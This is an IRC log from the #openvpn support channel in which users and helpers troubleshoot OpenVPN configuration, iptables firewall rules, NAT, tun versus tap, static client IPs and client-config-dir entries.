pekster> !management 00:28 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 00:29 < pekster> baobeiiii: Not necessarily; that depends on your firewall ruleset. If I'm pen-testing and I find some ports return an icmp-port-unreach but others just get dropped, the distinction is quite curious 00:29 < baobeiiii> although I guess they still get through netfilter and to the openvpn daemon 00:29 < baobeiiii> hence the logs 00:30 < xtreme_> pekster thanks 00:34 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has left #openvpn [] 00:42 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 252 seconds] 00:43 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn 00:45 < baobeiiii> i would have to go with bogus theory 00:45 < baobeiiii> i changed it so the ports aren't all forwarded, still get those connection attemps 00:45 < baobeiiii> from ports outside my small range that can be forwarded 00:46 -!- mattock is now known as mattock_afk 00:48 -!- brute11k1 [~brute11k@89.249.235.210] has joined #openvpn 00:49 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 240 seconds] 00:50 < pekster> How is "stop network connections from reaching you by limiting attackable surface area" a bogus theory? 00:50 < baobeiiii> bogus data or dos 00:50 < pekster> Close all your ports *including* 1194 and forward, say, 35972 into 1194 (some random number I just made up) 00:50 < baobeiiii> not bogus theory 00:50 < baobeiiii> ok 00:51 < pekster> That'll stop the attack unless the attackers just get lucky or are sitting in this channel watching for the next port you open ;) 00:51 < baobeiiii> aha 00:53 < pekster> Be smarter about your firewalls next time. OpenVPN can't even handle more than 64 profiles, so using more than 64 ports at any given time is usually a waste 00:54 < pekster> Write some cute script to randomly pick 64 ports (not in a range, actually *random* ports) between say 20000 and 65000, and communicate the change to clients 00:54 < pekster> And really, probably just 15 or 20 is likely to be sufficient and reduce attackable surface even more 00:57 < pekster> Here's a bash snippit to possibly get you started: http://dpaste.org/gcpxW/ 01:00 -!- mattock_afk is now known as mattock 01:01 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 01:02 < baobeiiii> yea it worked 01:02 -!- brute11k2 [~brute11k@89.249.235.210] has joined #openvpn 01:03 < baobeiiii> this http://pastebin.com/Sfsq33Gb stopped those packets 01:03 -!- brute11k1 [~brute11k@89.249.235.210] has quit [Ping timeout: 276 seconds] 01:03 < baobeiiii> can't get a more restrictive firewall than that 01:04 < pekster> 'iptables-save' is the preferred way to show netfilter rules 01:05 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 255 seconds] 01:06 < pekster> But yea, limiting to 51 ports is a better idea compared to 65k 01:06 -!- xtreme_ [~wtf@193.28.228.85] has quit [Ping timeout: 255 seconds] 01:09 -!- b1rkh0ff [~b1rkh0ff@178.77.26.26] has quit [Ping timeout: 260 seconds] 01:15 -!- JPeterson [~JPeterson@213.103.210.215] has quit [Ping timeout: 245 seconds] 01:20 -!- brute11k2 [~brute11k@89.249.235.210] has quit [Quit: Leaving.] 01:21 -!- b1rkh0ff [~b1rkh0ff@178.77.12.33] has joined #openvpn 01:26 < baobeiiii> in a bash script like i posted normaly the default chain rules (when drop) go at the bottom do they not 01:28 < pekster> It doesn't really matter. It's bad practice to use anything except the recommended iptables-save and iptables-restore for all the reasons the manpage lists 01:28 < baobeiiii> yea i just dont know how to write rules in that format 01:28 < pekster> You aren't going to find many people on Freenode (especially at #netfilter which is the relevant support channel) that are willing to help you with "iptables scripts" 01:31 < pekster> Try searching. https://duckduckgo.com/?q=iptables-save (faqs.org seems to have a semi-decent explanation for you) 01:31 <@vpnHelper> Title: iptables-save (Linux) at DuckDuckGo (at duckduckgo.com) 01:47 < baobeiiii> well, maybe this will be dissapointing lol 01:47 < baobeiiii> but i've gotten rip of the ip proto 15 problem 01:48 < baobeiiii> by removing openvpn and going back to version 2.2.2 01:48 < baobeiiii> rid* 01:49 < baobeiiii> feels like a bad way to fix an issue, going back to outdated version 01:49 < pekster> If you don't need 2.3.x features, it's a fine solution. Although I wonder if it's not ipv6-related with some service your server runs that tries to poll something every minute 01:50 < pekster> fwiw, I speculated as much on this point yesterday 01:51 < baobeiiii> i re-used everything in the openvpn directory after downgrading 01:51 < baobeiiii> so it hints at it being 2.3 related 01:51 < baobeiiii> yea your right probably 01:52 < baobeiiii> if 2.2.2 doesn't have those ip6 features it wouldn't be bothered by some service 02:01 -!- jaws [~root@5.231.5.192] has quit [Ping timeout: 248 seconds] 02:09 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 02:25 < baobeiiii> im happy with the firewall, apart from i can no longer ping 10.8.0.1, which i often do to check it's up 02:26 < pekster> So allow traffic that comes in on tun0 02:26 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 02:30 < baobeiiii> i'd ask how in netfilter but it seems like a shark tank 02:31 < pekster> Try searching for the -i switch in iptables(8) 02:32 < pekster> #netfilter has some good guides at the bottom of the primary /topic URL too; if you're that unfamiliar with netfilter/iptables, you should really spend the time to read one of the beginner's tutorials 02:34 -!- MaxDamage [Damage@46.238.18.82] has quit [Read error: Connection reset by peer] 02:41 -!- mirco_ [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 02:42 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 248 seconds] 02:42 -!- mirco_ is now known as mirco 02:53 -!- surfmasta [~bart@80.92.88.10] has joined #openvpn 02:59 < surfmasta> Hi, I have following setup: Clients (192.168.1.0/24) <-bridged network-> Router: 192.168.1.1 (OpenVPN client: 10.1.10.2) <-tunnel-> OpenVPN server: 10.0.0.1 (subnet 10.0.0.0/8) <-gateway-> Internet 03:00 < surfmasta> Now I have the problem that the packets coming in the OpenVPN server have the source IP 192.168.1.0/24, thats also something I can't change. I just have the power to make some configuration files on the OpenVPN client itself, but I would prefer to do something after the client side (on the server) 03:01 < surfmasta> and I want the packets to be mapped to source IPs in the 10.0.0.0/8 network when they go to the internet (internet is my own infrastructure, could also be an intranet) 03:03 < surfmasta> I would probably need something like an iptables-PREROUTING-SNAT, but SNAT just works in the POSTROUTING and that will be to late for me and when the packets already leave the OpenVPN server processing (tap device) then there could also be collisions in the mapping if more clients connect to it with the same subnetwork 192.168.1.0/24 03:05 < pekster> I don't have a clear picture of your network setup, but you seem to have multiple conflicting networks. You should fix that, or perform ugly NAT hackary to work around it. But fixing it is really what you should do 03:10 < pekster> surfmasta: You can see the --client-nat directive in the 2.3.0 version. It's nothing you couldn't already do with netfilter and NAT already, but it does it on your behalf. I think it's a bad solution, but it's there if you want to play with it 03:11 < surfmasta> ok thanks, i will take a look on this 03:12 < surfmasta> problem is that we want to have the client DSL-routers to be untouched as much as possible, and put a openvpn client on them, the only way that the client routers work with openvpn is a bridged network (Fritzbox) 03:13 < surfmasta> so we are limited in this step 03:14 < pekster> Sounds like you've started by shooting yourself in the foot with your requirements. NAT might save the rest of the body, but that kind of hackery is best avoided by not setting yourself up for unpleasentness from the start 03:15 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 03:15 < pekster> No idea why you're using bridging/tap either, but: 03:15 < pekster> !tunortap 03:15 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 03:15 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 03:15 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Read error: Connection reset by peer] 03:21 < baobeiiii> got ping working with iptables -A INPUT -i tun0 -p icmp --icmp-type echo-request -j ACCEPT 03:23 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:25 < pekster> Sounds reasonable 03:26 < sam1> !wins 03:26 <@vpnHelper> "wins" is http://oreilly.com/catalog/samba/chapter/book/ch07_03.html is a good link for seeing how to run WINS on samba 03:32 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:48 -!- aoconnell [~chatzilla@dsl-217-155-112-254.zen.co.uk] has joined #openvpn 03:50 < aoconnell> Hi, I have an openvpn server with a ton of clients that come and go, I know I can scrape the /var/log/openvpn-status.log, but can I use the -up and -down script triggers (or something similar) to trigger a bash/php script whenever a client gets added/removed? 03:51 < pekster> aoconnell: See the --client-disconnect and --client-connect scripts. I have a sample client-disconnect script that does some basic account about the client's session that's GPL-code you're free to browser and either mod to taste or use as-is: 03:51 < pekster> !accounting 03:51 <@vpnHelper> "accounting" is http://pekster.sdf.org/code/files/openvpn-user-accounting.tgz for some bash code for basic accounting 03:52 < aoconnell> Thanks Pekster 03:59 -!- dazo_afk is now known as dazo 04:05 -!- aoconnell [~chatzilla@dsl-217-155-112-254.zen.co.uk] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0/20130215130331]] 04:11 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 252 seconds] 04:12 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 04:15 -!- baobeiiii [~baobeiiii@180.155.14.35] has quit [Quit: Leaving] 04:45 -!- Devastator- [~devas@186.214.110.45] has quit [Changing host] 04:45 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 04:45 -!- Devastator- is now known as Devastator 05:01 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 05:36 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 05:37 -!- mode/#openvpn [+o plaisthos] by ChanServ 05:52 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 06:14 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has joined #openvpn 06:43 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 06:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B52866.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 07:05 -!- master_of_master [~master_of@p57B54352.dip.t-dialin.net] has joined #openvpn 07:12 -!- axelm7 [~axelm7@186.135.9.201] has joined #openvpn 07:16 -!- ihre [~kaas@office.shockmedia.nl] has joined #openvpn 07:16 -!- axelm7 [~axelm7@186.135.9.201] has quit [Ping timeout: 260 seconds] 07:19 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:21 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn 07:22 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 07:26 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 07:26 < xtz> hey guys 07:26 < xtz> does anyone have an idea if --port-share had already been extended to work with ssh? 07:27 <@plaisthos> xtz: it has not 07:27 <@plaisthos> only for http 07:27 < xtz> crap 07:27 <@plaisthos> for ssh it is also difficult 07:28 <@ecrist> good morning folks 07:28 <@plaisthos> because not the client but the server sends the first reply 07:29 < xtz> plaisthos: got it. thx buddy 07:52 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 07:56 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 07:56 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 07:59 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 07:59 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 08:04 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:05 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:13 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 08:43 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 08:47 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 276 seconds] 08:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 09:00 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:14 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 09:16 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 09:16 -!- nickanderson [~cmdln@ginger.pilgrimpage.com] has joined #openvpn 09:17 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 264 seconds] 09:31 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 09:32 -!- NChief [tomme@unaffiliated/nchief] has quit [Quit: gey] 09:34 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 09:40 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 248 seconds] 09:42 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 09:45 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 09:45 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Read error: Connection reset by peer] 09:57 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:02 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 264 seconds] 10:10 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:11 -!- raidz_away is now known as raidz 10:30 -!- ihre [~kaas@office.shockmedia.nl] has quit [Quit: Lost terminal] 10:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 10:36 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 10:38 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 10:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:54 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has joined #openvpn 11:05 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 11:06 -!- sauce [sauce@unaffiliated/sauce] has quit [Read error: Operation timed out] 11:07 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 11:07 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 11:10 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 11:10 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 12:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:45 -!- NomeFalso [~Aralucc10@151.77.232.145] has joined #openvpn 12:46 < NomeFalso> hi I have a openvpon tun network installed and I'd like to use my XBMC as upnp server / client streaming videos thru it but it doesn't work. It works fine locally mthough... any advice? 12:46 < NomeFalso> upnp servers are not seen when using vpn 12:48 < pekster> uPnP uses subnet broadcast/multicast features that you don't get when using tun, which is an OSI Layer 3 (IP) level connection. You'd need tap for that 12:48 < pekster> https://en.wikipedia.org/wiki/Universal_Plug_and_Play#Protocol 12:48 <@vpnHelper> Title: Universal Plug and Play - Wikipedia, the free encyclopedia (at en.wikipedia.org) 12:49 < pekster> You might be able to use upnp, just not the discovery portion depending on how much you know about the target network ahead of time 12:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 252 seconds] 12:58 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Read error: Operation timed out] 13:04 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn 13:05 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 13:05 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 13:07 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 13:07 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 13:34 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has quit [Ping timeout: 248 seconds] 13:42 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:42 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 13:47 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has joined #openvpn 13:50 < KaiForce> any fix for the crash of 2.3 on Win 7 (and 8?) when connecting as described here: https://forums.openvpn.net/topic11901.html 13:50 <@vpnHelper> Title: OpenVPN Support Forum OpenVPN crash windows8 x64 - 2.3 build : Testing branch (at forums.openvpn.net) 13:51 < KaiForce> i've seen it on two win 7 machines. 13:53 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 14:01 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 14:01 -!- mode/#openvpn [+o krzee] by ChanServ 14:02 -!- Perun [perun@chao5.net] has joined #openvpn 14:02 < Perun> hi all 14:02 <@dazo> KaiForce: has it been filed as a bug report in Trac? if not ... then the developer most likely haven't noticed this issue at all 14:03 < Perun> if I have server 10.0.4.0 255.255.255.0 in openvpn 'server' conf, the gets the server ever the .1 address of this net... how can I configure an other ip for server? for example the .10? 14:04 <@dazo> Perun: don't use --server ... and read the man page about --server ... it describes exactly what this "macro" does there ... that way, you can do that yourself 14:05 < Perun> dazo: oh you mean "mode server ... " in the conf? 14:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:06 <@dazo> Perun: no ... I mean --server 14:06 <@krzee> whats wrong with .1? 14:06 <@krzee> ...are you using the same subnet as the lan? 14:06 < Perun> no 14:06 <@krzee> k good 14:06 < Perun> but my dns is already configured 14:08 <@dazo> Perun: http://openvpn.net/index.php/open-source/documentation/manuals/openvpn-21.html#lbAH 14:08 <@vpnHelper> Title: OpenVPN 2.1 (at openvpn.net) 14:08 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 14:08 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 14:08 <@krzee> do you have some ninja method of finding anchors or do you look at the src like i do? 14:09 < Perun> dazo: I understand hmm but in the example: ifconfig 10.8.0.1 10.8.0.2, who is the .2? 14:10 <@dazo> krzee: nope ... view source ... search and look for the tag ;-) 14:10 <@krzee> hehe ya same as i 14:10 <@krzee> !/30 14:10 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 14:10 <@krzee> Perun, to understand who the 2 is ^ 14:11 <@dazo> Perun: the 10.8.0.2 is calculated, based on the 10.8.0.0 from the --server argument 14:12 < Perun> aha ok 14:12 <@dazo> Perun: the sane way to do this ... is to use --topology subnet ... and ignore the net30 mode 14:13 < Perun> and if I dont define an ip pool I need to configure on each client his ip in the openvpn subnet? 14:13 <@dazo> I'm not sure it would start at all 14:13 <@dazo> I think it would complain 14:21 < Perun> dazo: but I can configure a static ip on each client? 14:22 <@krzee> !static 14:22 <@vpnHelper> "static" is (#1) use --ifconfig-push in a ccd entry for a static ip for the vpn client or (#2) example in net30 (default): ifconfig-push 10.8.0.6 10.8.0.5 example in subnet (see !topology) or tap (see !tunortap): ifconfig-push 10.8.0.5 255.255.255.0 or (#3) also see !ccd and !iporder 14:22 < Perun> !ccd 14:22 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 14:25 < Perun> hmm what is the common-name? the common-name field in the ssl cert? 14:25 <@dazo> yes 14:25 < Perun> aha 14:26 <@krzee> !certinfo 14:26 <@vpnHelper> "certinfo" is run `openssl x509 -in -noout -text` for info from your cert file 14:26 <@dazo> but some char replacement happens on the filename ... look for "character mangling" in the man page, iirc 14:30 -!- phantomcircuit [~phantomci@covertinferno.org] has quit [Ping timeout: 260 seconds] 14:31 < Perun> http://pastebin.com/PrQ998LF it is look ok? 14:31 -!- mirovengi [~mirovengi@209.59.130.4] has joined #openvpn 14:32 < mirovengi> does the openvpn client on the website only work for the paid product? will it work with with the community edition? 14:32 < mirovengi> *specifically the windows client 14:32 <@krzee> !as 14:32 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 14:33 <@krzee> they'll know 14:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:33 < mirovengi> in the meantime, is there a windows client that will connect to openvpn community edition? 14:38 <@krzee> !download 14:38 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 14:38 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 14:46 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:48 -!- giskard [~giskard@static.5.188.47.78.clients.your-server.de] has joined #openvpn 14:48 < giskard> hello 14:49 < giskard> Hello 14:49 < giskard> I get "Bad LZO decompression header byte: 0" message when I try to connect to my openvpn server 14:49 < giskard> (comp-lzo is on on both server and client conf) 14:49 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Quit: Leaving] 14:50 < giskard> So, i deleted the comp-lzo line, and now, I get this: FRAG_IN error flags=0xffffffff: FRAG_TEST not implemented 14:51 < giskard> I found nothing relevant with google 14:51 < giskard> only 2005 messages… 14:54 -!- giskard [~giskard@static.5.188.47.78.clients.your-server.de] has quit [Quit: leaving] 14:58 < Perun> dazo: but I can configure a static ip on each client 192.168.60.1 via 255.255.255.0 dev tun_ovpn_xaphon and 255.255.255.0 dev tun_ovpn_xaphon proto kernel scope link src 192.168.60.140, it is normal? 14:58 < Perun> argh sorry 14:58 < Perun> I see these routes on clinet now: 192.168.60.1 via 255.255.255.0 dev tun_ovpn_xaphon and 255.255.255.0 dev tun_ovpn_xaphon proto kernel scope link src 192.168.60.140, it is normal? 14:59 -!- dazo is now known as dazo_afk 15:04 -!- ben1066_ is now known as ben1066 15:25 < Perun> I mean it works but it is normal? the ptp address of the tun device is 255.255.255.0 to hmmmm why not the openvpn server ip in the openvpn subnet? 15:27 < mirovengi> what's the shortcut for your bot to get common problems with the windows client? Is there a config check tool? I'm trying to connect and it doesn't look like it makes it out of the box and yet the log file is empty 15:28 < mirovengi> I can also watch logs on my openvpn server and see it's not getting any connects 15:29 -!- grendal-prime [~sgraham@173-166-255-77-stockton.hfc.comcastbusiness.net] has joined #openvpn 15:30 -!- b1rkh0ff [~b1rkh0ff@178.77.12.33] has quit [Quit: Leaving] 15:30 < grendal-prime> hey guys im really stupid when it comes to windows...(i mean im kinda glad to say that really) but anyway..How do i get the desktop task manager thang to start and run as administrator automatically? 15:30 < grendal-prime> is there like a sudo..type thing for windows? 15:30 <@krzee> services 15:31 < grendal-prime> ya but i dont want it to just start and connect all the time. 15:31 <@krzee> then i dunno 15:31 <@krzee> maybe this: 15:31 < grendal-prime> i need these guys to be able to log out and in. and...i have to push them routes 15:31 <@krzee> right click - properties - compat mode - run as admin 15:31 <@krzee> but i think that requires pw 15:32 -!- mirco [~mirco@p50805527.dip.t-dialin.net] has joined #openvpn 15:32 < grendal-prime> dude thanks 15:32 < grendal-prime> that looks exactly like what i need... 15:32 < grendal-prime> i owe you again...id have been fkn around with taht forever 15:33 <@krzee> i dont even use windows, it's just that common :D 15:33 < grendal-prime> looking for a check box..in a window...that i need to select from a drop down...under a fuzzy filter .. 15:33 <@krzee> totally 15:33 <@krzee> lol 15:33 < grendal-prime> how you been man? 15:34 <@krzee> by common i mean commonly not found by people 15:34 <@krzee> :D 15:34 <@krzee> good, finally home from "vacation" 15:34 <@krzee> which was more work than being home 15:34 <@krzee> lol 15:34 < grendal-prime> i hear ya 15:34 <@krzee> launched a new product 15:34 < grendal-prime> i got laid off from my networking job...and its harder being home that it was at work 15:35 <@krzee> did my first interview 15:35 <@krzee> http://www.kittyfeet.com/2013/02/14/jeff-from-liberty-private-network-talks-about-his-secure-bat-phones/ 15:35 <@vpnHelper> Title: » Jeff from Liberty Private Network Talks About His Secure Bat Phones. Anarchy Gumbo Podcast (at www.kittyfeet.com) 15:35 < grendal-prime> when yo go to work every day..your wife just keeps adding to a list of crap you need to do and then when you get laid off ..you get that list. 15:36 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Ping timeout: 260 seconds] 15:40 -!- mirovengi [~mirovengi@209.59.130.4] has left #openvpn [] 15:47 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 15:49 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn 15:53 -!- Orbi [~opera@anon-163-27.vpn.ipredator.se] has left #openvpn [] 15:57 -!- nickanderson is now known as nickanderson_afk 15:58 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has quit [Ping timeout: 240 seconds] 15:59 -!- phantomcircuit [~phantomci@covertinferno.org] has quit [Quit: quit] 16:02 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has joined #openvpn 16:08 -!- phantomcircuit [~phantomci@covertinferno.org] has joined #openvpn 16:10 < hazardous> krzee: yo 16:11 -!- KaiForce [~chatzilla@adsl-70-228-64-42.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 16:12 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:13 < novaflash> right 16:13 < novaflash> !cert 16:13 < novaflash> !search certificates 16:13 <@vpnHelper> There were no matching configuration variables. 16:13 < novaflash> nyatg. 16:13 < novaflash> !certificates 16:13 < novaflash> !pingpongballs 16:13 < hazardous> !novaflash 16:13 < hazardous> !cisco 16:13 <@vpnHelper> "cisco" is (#1) An open-source client for Cisco SSL VPN is available from http://www.infradead.org/openconnect.html or (#2) OpenConnect is availabe in FreeBSD ports in security/openconnect 16:13 < hazardous> well that's less fun 16:13 < novaflash> i like our !cisco better 16:15 < Perun> I want to add a route to the openvpn server to a network behind a client if the client connects... it is possible? 16:15 < Perun> only for one client 16:15 < novaflash> !gateway 16:15 < novaflash> why don't these knowledge things have any names i know! 16:15 < novaflash> !route 16:15 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 16:25 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 16:35 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:46 -!- grendal-prime [~sgraham@173-166-255-77-stockton.hfc.comcastbusiness.net] has quit [Ping timeout: 276 seconds] 16:47 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 16:48 -!- NomeFalso [~Aralucc10@151.77.232.145] has quit [Ping timeout: 255 seconds] 16:49 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 272 seconds] 16:57 -!- sw0rdfish [sw0rdfish@bouncing.users.since.2011.panicbnc.org] has quit [Changing host] 16:57 -!- sw0rdfish [sw0rdfish@unaffiliated/sw0rdfish] has joined #openvpn 17:18 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 17:20 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 276 seconds] 17:22 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 245 seconds] 17:25 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 18:11 -!- plut0 [~cory@pool-96-236-43-69.albyny.fios.verizon.net] has joined #openvpn 18:12 < plut0> getting this error when connecting, "received corrupted data from proxy server". client config: http://pastebin.com/hX9Cs7uV client log: http://pastebin.com/WkCKewP9 18:24 -!- mndo [~mndo@bl17-70-52.dsl.telepac.pt] has joined #openvpn 18:25 -!- ihre [~kaas@86.86.252.187] has joined #openvpn 18:27 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has joined #openvpn 18:31 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 18:31 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 18:43 -!- grendal-prime [~sgraham@adsl-99-22-153-166.dsl.skt2ca.sbcglobal.net] has joined #openvpn 18:43 -!- grendal-prime 